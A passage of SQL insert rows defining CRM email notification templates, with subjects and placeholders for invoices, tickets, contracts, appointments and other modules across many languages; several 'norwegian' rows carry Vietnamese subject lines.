(2685, 'spreadsheet_online', 'spreadsheet-share-assigned', 'chinese', 'Spreadsheet share assigned [chinese]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2686, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'chinese', 'Spreadsheet share assigned client [chinese]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2687, 'spreadsheet_online', 'spreadsheet-share-assigned', 'vietnamese', 'Spreadsheet share assigned [vietnamese]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2688, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'vietnamese', 'Spreadsheet share assigned client [vietnamese]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2689, 'spreadsheet_online', 'spreadsheet-share-assigned', 'indonesia', 'Spreadsheet share assigned [indonesia]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2690, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'indonesia', 'Spreadsheet share assigned client [indonesia]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2691, 'spreadsheet_online', 'spreadsheet-share-assigned', 'french', 'Spreadsheet share assigned [french]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2692, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'french', 'Spreadsheet share assigned client [french]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2693, 'spreadsheet_online', 'spreadsheet-share-assigned', 'czech', 'Spreadsheet share assigned [czech]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2694, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'czech', 'Spreadsheet share assigned client [czech]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2695, 'spreadsheet_online', 'spreadsheet-share-assigned', 'romanian', 'Spreadsheet share assigned [romanian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2696, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'romanian', 'Spreadsheet share assigned client [romanian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2697, 'spreadsheet_online', 'spreadsheet-share-assigned', 'polish', 'Spreadsheet share assigned [polish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2698, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'polish', 'Spreadsheet share assigned client [polish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2699, 'spreadsheet_online', 'spreadsheet-share-assigned', 'ukrainian', 'Spreadsheet share assigned [ukrainian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2700, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'ukrainian', 'Spreadsheet share assigned client [ukrainian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2701, 'spreadsheet_online', 'spreadsheet-share-assigned', 'persian', 'Spreadsheet share assigned [persian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2702, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'persian', 'Spreadsheet share assigned client [persian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2703, 'spreadsheet_online', 'spreadsheet-share-assigned', 'japanese', 'Spreadsheet share assigned [japanese]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2704, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'japanese', 'Spreadsheet share assigned client [japanese]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2705, 'spreadsheet_online', 'spreadsheet-share-assigned', 'spanish', 'Spreadsheet share assigned [spanish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2706, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'spanish', 'Spreadsheet share assigned client [spanish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2707, 'spreadsheet_online', 'spreadsheet-share-assigned', 'italian', 'Spreadsheet share assigned [italian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2708, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'italian', 'Spreadsheet share assigned client [italian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2709, 'spreadsheet_online', 'spreadsheet-share-assigned', 'slovak', 'Spreadsheet share assigned [slovak]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2710, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'slovak', 'Spreadsheet share assigned client [slovak]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2711, 'spreadsheet_online', 'spreadsheet-share-assigned', 'portuguese_br', 'Spreadsheet share assigned [portuguese_br]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2712, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'portuguese_br', 'Spreadsheet share assigned client [portuguese_br]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2713, 'contract', 'contract-sign-reminder', 'english', 'Contract Sign Reminder (Sent to Customer)', 'Contract Sign Reminder', '<p>Hello {contact_firstname} {contact_lastname}<br /><br />This is a reminder to review and sign the contract:<a href=\"{contract_link}\">{contract_subject}</a></p><p>You can view and sign by visiting: <a href=\"{contract_link}\">{contract_subject}</a></p><p><br />We are looking forward working with you.<br /><br />Kind Regards,<br /><br />{email_signature}</p>', '{companyname} | CRM', NULL, 0, 1, 0),
(2714, 'contract', 'contract-sign-reminder', 'swedish', 'Contract Sign Reminder (Sent to Customer) [swedish]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2715, 'contract', 'contract-sign-reminder', 'portuguese', 'Contract Sign Reminder (Sent to Customer) [portuguese]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2716, 'contract', 'contract-sign-reminder', 'turkish', 'Contract Sign Reminder (Sent to Customer) [turkish]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2717, 'contract', 'contract-sign-reminder', 'bulgarian', 'Contract Sign Reminder (Sent to Customer) [bulgarian]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2718, 'contract', 'contract-sign-reminder', 'dutch', 'Contract Sign Reminder (Sent to Customer) [dutch]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2719, 'contract', 'contract-sign-reminder', 'russian', 'Contract Sign Reminder (Sent to Customer) [russian]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2720, 'client', 'new-client-created', 'norwegian', 'New Contact Added/Registered (Welcome Email) [norwegian]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2721, 'invoice', 'invoice-send-to-client', 'norwegian', 'Send Invoice to Customer [norwegian]', 'Hoa don so {invoice_number}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2722, 'ticket', 'new-ticket-opened-admin', 'norwegian', 'New Ticket Opened (Opened by Staff, Sent to Customer) [norwegian]', 'Yêu cầu Hỗ Trợ Mới gởi đến bạn', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2723, 'ticket', 'ticket-reply', 'norwegian', 'Ticket Reply (Sent to Customer) [norwegian]', 'Hỗ trợ khách hàng | Phản hồi thông tin | Tổ chức đào tạo WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2724, 'ticket', 'ticket-autoresponse', 'norwegian', 'New Ticket Opened - Autoresponse [norwegian]', 'Phản hồi hỗ trợ khách hàng | Đã được tạo mới ', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2725, 'invoice', 'invoice-payment-recorded', 'norwegian', 'Invoice Payment Recorded (Sent to Customer) [norwegian]', 'Xác nhận thanh toán - WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2726, 'invoice', 'invoice-overdue-notice', 'norwegian', 'Invoice Overdue Notice [norwegian]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2727, 'invoice', 'invoice-already-send', 'norwegian', 'Invoice Already Sent to Customer [norwegian]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2728, 'ticket', 'new-ticket-created-staff', 'norwegian', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [norwegian]', 'Đã tạo một yêu cầu Hỗ trợ mới | Tổ chức đào tạo WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2729, 'estimate', 'estimate-send-to-client', 'norwegian', 'Send Estimate to Customer [norwegian]', 'Yeu cau bao gia So: # {estimate_number} ', '', '{companyname} |  yêu cầu', NULL, 0, 0, 0),
(2730, 'ticket', 'ticket-reply-to-admin', 'norwegian', 'Ticket Reply (Sent to Staff) [norwegian]', 'Trả lời mới | Yêu cầu hỗ trợ', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2731, 'estimate', 'estimate-already-send', 'norwegian', 'Estimate Already Sent to Customer [norwegian]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2732, 'contract', 'contract-expiration', 'norwegian', 'Contract Expiration Reminder (Sent to Customer Contacts) [norwegian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2733, 'tasks', 'task-assigned', 'norwegian', 'New Task Assigned (Sent to Staff) [norwegian]', 'NHIỆM VỤ MỚI được giao - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2734, 'tasks', 'task-added-as-follower', 'norwegian', 'Staff Member Added as Follower on Task (Sent to Staff) [norwegian]', 'Bạn được thêm làm người theo dõi trong nhiệm vụ  - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2735, 'tasks', 'task-commented', 'norwegian', 'New Comment on Task (Sent to Staff) [norwegian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2736, 'tasks', 'task-added-attachment', 'norwegian', 'New Attachment(s) on Task (Sent to Staff) [norwegian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2737, 'estimate', 'estimate-declined-to-staff', 'norwegian', 'Estimate Declined (Sent to Staff) [norwegian]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2738, 'estimate', 'estimate-accepted-to-staff', 'norwegian', 'Estimate Accepted (Sent to Staff) [norwegian]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2739, 'proposals', 'proposal-client-accepted', 'norwegian', 'Customer Action - Accepted (Sent to Staff) [norwegian]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2740, 'proposals', 'proposal-send-to-customer', 'norwegian', 'Send Proposal to Customer [norwegian]', 'De xuat bao gia so {proposal_number} - Tổ chức đào tạo WIT nhà cung cấp quạt mát toàn diện', '', '{companyname} | Tổ chức đào tạo WIT', NULL, 0, 0, 0),
(2741, 'proposals', 'proposal-client-declined', 'norwegian', 'Customer Action - Declined (Sent to Staff) [norwegian]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2742, 'proposals', 'proposal-client-thank-you', 'norwegian', 'Thank You Email (Sent to Customer After Accept) [norwegian]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2743, 'proposals', 'proposal-comment-to-client', 'norwegian', 'New Comment  (Sent to Customer/Lead) [norwegian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2744, 'proposals', 'proposal-comment-to-admin', 'norwegian', 'New Comment (Sent to Staff)  [norwegian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2745, 'estimate', 'estimate-thank-you-to-customer', 'norwegian', 'Thank You Email (Sent to Customer After Accept) [norwegian]', 'Thank for you accepting estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2746, 'tasks', 'task-deadline-notification', 'norwegian', 'Task Deadline Reminder - Sent to Assigned Members [norwegian]', 'NHẮC NHỞ - thời hạn nhiệm vụ | {companyname}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2747, 'contract', 'send-contract', 'norwegian', 'Send Contract to Customer [norwegian]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2748, 'invoice', 'invoice-payment-recorded-to-staff', 'norwegian', 'Invoice Payment Recorded (Sent to Staff) [norwegian]', 'Xác nhận thanh toán - WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2749, 'ticket', 'auto-close-ticket', 'norwegian', 'Auto Close Ticket [norwegian]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2750, 'project', 'new-project-discussion-created-to-staff', 'norwegian', 'New Project Discussion (Sent to Project Members) [norwegian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2751, 'project', 'new-project-discussion-created-to-customer', 'norwegian', 'New Project Discussion (Sent to Customer Contacts) [norwegian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2752, 'project', 'new-project-file-uploaded-to-customer', 'norwegian', 'New Project File(s) Uploaded (Sent to Customer Contacts) [norwegian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2753, 'project', 'new-project-file-uploaded-to-staff', 'norwegian', 'New Project File(s) Uploaded (Sent to Project Members) [norwegian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2754, 'project', 'new-project-discussion-comment-to-customer', 'norwegian', 'New Discussion Comment  (Sent to Customer Contacts) [norwegian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2755, 'project', 'new-project-discussion-comment-to-staff', 'norwegian', 'New Discussion Comment (Sent to Project Members) [norwegian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2756, 'project', 'staff-added-as-project-member', 'norwegian', 'Staff Added as Project Member [norwegian]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2757, 'estimate', 'estimate-expiry-reminder', 'norwegian', 'Estimate Expiration Reminder [norwegian]', 'Nhắc nhở hết hạn | Đề Xuất Báo Giá', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2758, 'proposals', 'proposal-expiry-reminder', 'norwegian', 'Proposal Expiration Reminder [norwegian]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2759, 'staff', 'new-staff-created', 'norwegian', 'New Staff Created (Welcome Email) [norwegian]', 'Nhan vien moi da duoc tao', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2760, 'client', 'contact-forgot-password', 'norwegian', 'Forgot Password [norwegian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2761, 'client', 'contact-password-reseted', 'norwegian', 'Password Reset - Confirmation [norwegian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2762, 'client', 'contact-set-password', 'norwegian', 'Set New Password [norwegian]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2763, 'staff', 'staff-forgot-password', 'norwegian', 'Forgot Password [norwegian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2764, 'staff', 'staff-password-reseted', 'norwegian', 'Password Reset - Confirmation [norwegian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2765, 'project', 'assigned-to-project', 'norwegian', 'New Project Created (Sent to Customer Contacts) [norwegian]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2766, 'tasks', 'task-added-attachment-to-contacts', 'norwegian', 'New Attachment(s) on Task (Sent to Customer Contacts) [norwegian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2767, 'tasks', 'task-commented-to-contacts', 'norwegian', 'New Comment on Task (Sent to Customer Contacts) [norwegian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2768, 'leads', 'new-lead-assigned', 'norwegian', 'New Lead Assigned to Staff Member [norwegian]', 'Khách hàng tiềm năng {lead_name}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2769, 'client', 'client-statement', 'norwegian', 'Statement - Account Summary [norwegian]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2770, 'ticket', 'ticket-assigned-to-admin', 'norwegian', 'New Ticket Assigned (Sent to Staff) [norwegian]', 'Phiếu hỗ trợ mới - đã được chỉ định cho bạn', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2771, 'client', 'new-client-registered-to-admin', 'norwegian', 'New Customer Registration (Sent to admins) [norwegian]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2772, 'leads', 'new-web-to-lead-form-submitted', 'norwegian', 'Web to lead form submitted - Sent to lead [norwegian]', '{lead_name} - Chúng tôi đã nhận được yêu cầu của bạn', '', '{companyname} | Tổ chức đào tạo WIT', NULL, 0, 0, 0),
(2773, 'staff', 'two-factor-authentication', 'norwegian', 'Two Factor Authentication [norwegian]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2774, 'project', 'project-finished-to-customer', 'norwegian', 'Project Marked as Finished (Sent to Customer Contacts) [norwegian]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2775, 'credit_note', 'credit-note-send-to-client', 'norwegian', 'Send Credit Note To Email [norwegian]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2776, 'tasks', 'task-status-change-to-staff', 'norwegian', 'Task Status Changed (Sent to Staff) [norwegian]', 'NHẮC NHỞ | Công việc phân công - WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2777, 'tasks', 'task-status-change-to-contacts', 'norwegian', 'Task Status Changed (Sent to Customer Contacts) [norwegian]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2778, 'staff', 'reminder-email-staff', 'norwegian', 'Staff Reminder Email [norwegian]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2779, 'contract', 'contract-comment-to-client', 'norwegian', 'New Comment  (Sent to Customer Contacts) [norwegian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2780, 'contract', 'contract-comment-to-admin', 'norwegian', 'New Comment (Sent to Staff)  [norwegian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2781, 'subscriptions', 'send-subscription', 'norwegian', 'Send Subscription to Customer [norwegian]', 'Đăng ký đã được tạo {companyname}', '', '{companyname} | CRM', NULL, 1, 0, 0),
(2782, 'subscriptions', 'subscription-payment-failed', 'norwegian', 'Subscription Payment Failed [norwegian]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2783, 'subscriptions', 'subscription-canceled', 'norwegian', 'Subscription Canceled (Sent to customer primary contact) [norwegian]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2784, 'subscriptions', 'subscription-payment-succeeded', 'norwegian', 'Subscription Payment Succeeded (Sent to customer primary contact) [norwegian]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2785, 'contract', 'contract-expiration-to-staff', 'norwegian', 'Contract Expiration Reminder (Sent to Staff) [norwegian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2786, 'gdpr', 'gdpr-removal-request', 'norwegian', 'Removal Request From Contact (Sent to administrators) [norwegian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2787, 'gdpr', 'gdpr-removal-request-lead', 'norwegian', 'Removal Request From Lead (Sent to administrators) [norwegian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2788, 'client', 'client-registration-confirmed', 'norwegian', 'Customer Registration Confirmed [norwegian]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2789, 'contract', 'contract-signed-to-staff', 'norwegian', 'Contract Signed (Sent to Staff) [norwegian]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2790, 'subscriptions', 'customer-subscribed-to-staff', 'norwegian', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [norwegian]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2791, 'client', 'contact-verification-email', 'norwegian', 'Email Verification (Sent to Contact After Registration) [norwegian]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2792, 'client', 'new-customer-profile-file-uploaded-to-staff', 'norwegian', 'New Customer Profile File(s) Uploaded (Sent to Staff) [norwegian]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2793, 'staff', 'event-notification-to-staff', 'norwegian', 'Event Notification (Calendar) [norwegian]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(2794, 'subscriptions', 'subscription-payment-requires-action', 'norwegian', 'Credit Card Authorization Required - SCA [norwegian]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2795, 'invoice', 'invoice-due-notice', 'norwegian', 'Invoice Due Notice [norwegian]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2796, 'estimate_request', 'estimate-request-submitted-to-staff', 'norwegian', 'Estimate Request Submitted (Sent to Staff) [norwegian]', 'Yêu cầu Tư Vấn - Hỗ Trợ mới đã được gửi cho bạn', '', '{companyname} | CRM Tổ chức đào tạo WIT', NULL, 0, 1, 0),
(2797, 'estimate_request', 'estimate-request-assigned', 'norwegian', 'Estimate Request Assigned (Sent to Staff) [norwegian]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2798, 'estimate_request', 'estimate-request-received-to-user', 'norwegian', 'Estimate Request Received (Sent to User) [norwegian]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2799, 'inventory_warning', 'inventory-warning-to-staff', 'norwegian', 'Inventory warning (Sent to staff) [norwegian]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2800, 'purchase_order', 'purchase-order-to-contact', 'norwegian', 'Purchase Order (Sent to contact) [norwegian]', 'Đơn đặt hàng {po_number} | WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2801, 'appointly', 'appointment-cron-reminder-to-staff', 'norwegian', 'Appointment reminder (Sent to Staff and Attendees) [norwegian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2802, 'appointly', 'appointment-recurring-to-staff', 'norwegian', 'Appointment recurring (Sent to Staff and Attendees) [norwegian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2803, 'appointly', 'appointment-cancelled-to-staff', 'norwegian', 'Appointment cancelled (Sent to Staff and Attendees) [norwegian]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2804, 'appointly', 'appointment-cancelled-to-contact', 'norwegian', 'Appointment cancelled (Sent to Contact) [norwegian]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2805, 'appointly', 'appointment-cron-reminder-to-contact', 'norwegian', 'Appointment reminder (Sent to Contact) [norwegian]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2806, 'appointly', 'appointment-recurring-to-contacts', 'norwegian', 'Appointment recurring (Sent to Contact) [norwegian]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2807, 'appointly', 'appointment-approved-to-staff', 'norwegian', 'Appointment approved (Sent to Staff and Atendees) [norwegian]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2808, 'appointly', 'appointment-approved-to-contact', 'norwegian', 'Appointment approved (Sent to Contact) [norwegian]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2809, 'appointly', 'appointment-submitted-to-staff', 'norwegian', 'New appointment request (Sent to Responsible Person) [norwegian]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2810, 'appointly', 'callback-assigned-to-staff', 'norwegian', 'Assigned to callback (Sent to Staff) [norwegian]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2811, 'appointly', 'newcallback-requested-to-staff', 'norwegian', 'New callback request (Sent to Callbacks Responsible Person) [norwegian]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2812, 'appointly', 'appointly-appointment-request-feedback', 'norwegian', 'Request Appointment Feedback (Sent to Client) [norwegian]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2813, 'appointly', 'appointly-appointment-feedback-received', 'norwegian', 'New Feedback Received (Sent to Responsible Person) [norwegian]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2814, 'appointly', 'appointly-appointment-feedback-updated', 'norwegian', 'Feedback Updated (Sent to Responsible Person) [norwegian]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2815, 'approve', 'send-request-approve', 'norwegian', 'Send Approval Request [norwegian]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2816, 'approve', 'send_rejected', 'norwegian', 'Send Rejected [norwegian]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2817, 'approve', 'send_approve', 'norwegian', 'Send Approve [norwegian]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2818, 'notifications', 'non-billed-tasks-reminder', 'norwegian', 'Non-billed tasks reminder (sent to selected staff members) [norwegian]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2819, 'invoice', 'invoices-batch-payments', 'norwegian', 'Invoices Payments Recorded in Batch (Sent to Customer) [norwegian]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2820, 'purchase_order', 'purchase-request-to-contact', 'norwegian', 'Purchase Request (Sent to contact) [norwegian]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2821, 'purchase_order', 'purchase-quotation-to-contact', 'norwegian', 'Purchase Quotation (Sent to contact) [norwegian]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2822, 'purchase_order', 'debit-note-to-contact', 'norwegian', 'Debit Note (Sent to contact) [norwegian]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2823, 'purchase_order', 'purchase-statement-to-contact', 'norwegian', 'Purchase Statement (Sent to contact) [norwegian]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2824, 'omni_sales', 'purchase-receipt', 'norwegian', 'Purchase receipt (Sent to customer) [norwegian]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2825, 'omni_sales', 'pre-orders-notify', 'norwegian', 'Pre-orders notify (Sent to seller) [norwegian]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2826, 'omni_sales', 'pre-orders-handover', 'norwegian', 'Pre-orders handover [norwegian]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2827, 'loyalty', 'loyalty-new-account-bonus-point', 'norwegian', 'Loyalty new account bonus point (Sent to contact) [norwegian]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2828, 'loyalty', 'loyalty-birthday-bonus-point', 'norwegian', 'Loyalty birthday bonus point (Sent to contact) [norwegian]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2829, 'client', 'reminder-send-to-contact', 'norwegian', 'Reminder [norwegian]', 'New Reminder', '', '', NULL, 0, 1, 0),
(2830, 'client', 'reminder-service-send-to-contact', 'norwegian', 'Services [norwegian]', 'New Service', '', '', NULL, 0, 1, 0),
(2831, 'spreadsheet_online', 'spreadsheet-share-assigned', 'norwegian', 'Spreadsheet share assigned [norwegian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
